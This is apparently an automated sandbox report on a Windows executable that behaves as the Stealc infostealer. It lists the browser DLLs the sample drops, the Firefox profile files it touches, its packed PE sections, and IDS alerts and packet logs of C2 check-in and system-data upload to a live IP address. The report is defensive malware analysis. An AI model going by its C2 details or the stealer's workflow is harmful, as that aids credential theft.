Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: fXg8zgxVTF.exe, Detection: malicious, Browse Filename: T220UXIoKO.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: g4Cyr2T5jq.exe, Detection: malicious, Browse Filename: NK3SASJheq.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: fXg8zgxVTF.exe, Detection: malicious, Browse Filename: T220UXIoKO.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: g4Cyr2T5jq.exe, Detection: malicious, Browse Filename: NK3SASJheq.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.949277702839676
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'852'928 bytes
MD5:	fe2148029209699e0ee2cba27c4d5f8b
SHA1:	4c9a256eedfa50b45b488e01c656bd72ddec016d
SHA256:	2202c6a6673d6a90682946b94edfc8c6bac495997e064c62b36bc0f046457a51
SHA512:	3d933415de68bd2d15e3d69d4e095aef5d6614d1fde26aa83f97b5788f7282912bbd9dc943572ec0f29a9e6946cc30dbe6647841cc8a715093c011997c81343f
SSDEEP:	24576:6Yv8pzmkm89otFC6WlLfDlV6TDRw9LxaYUKMatOLZLXj5qdy7GQPc/LSCcMFIpF5:6lzzfSFC6wbZmNkLxaYllsFOamcFd
TLSH:	9385330B2D7B756EC6A5217127B7C20F281E406E4E5EF2E2154180E74B2BFE274D74AE
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xa9f000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FEFB8D531EAh

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	33df0798b479eb669369029284a02d33	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x2a1000	0x200	a076c57d3f4969dad587079796b18361	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ffngccge	0x4ff000	0x19f000	0x19e400	d330c44522bc34af322073b0c3cc8bb0	False	0.9948113118587809	data	7.954195447661275	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
atmmyeyl	0x69e000	0x1000	0x400	fe579668d8f3eab9e418bdf0a58e84f1	False	0.724609375	data	5.813475456115741	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x69f000	0x3000	0x2200	b4046ef97c66d03399b572881777eb01	False	0.06192555147058824	DOS executable (COM)	0.7637067332988177	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-24T19:29:05.148928+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-24T19:29:05.436607+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-24T19:29:05.443627+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.4	49730	TCP
2024-10-24T19:29:05.724623+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-24T19:29:05.733776+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.4	49730	TCP
2024-10-24T19:29:06.840247+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-24T19:29:07.714647+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-24T19:29:14.884091+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-24T19:29:16.257109+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-24T19:29:17.178133+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-24T19:29:18.016493+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-24T19:29:19.938641+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-24T19:29:20.605637+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 19:29:03.925925016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:03.931353092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:03.931473017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:03.931624889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:03.936945915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:04.847244024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:04.847342968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:04.850766897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:04.856148005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:05.148772001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:05.148927927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:05.150330067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:05.155765057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:05.436517000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:05.436542988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:05.436606884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:05.436606884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:05.438244104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:05.443627119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:05.724539995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:05.724586010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:05.724622965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:05.724625111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:05.724642038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:05.724663973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:05.724678040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:05.724699020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:05.724714041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:05.724734068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:05.724747896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:05.724778891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:05.725178003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:05.725235939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:05.726116896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:05.726176977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:05.728013039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:05.733776093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:06.013905048 CEST	80	49730	185.215.113.37	192.168.2.4
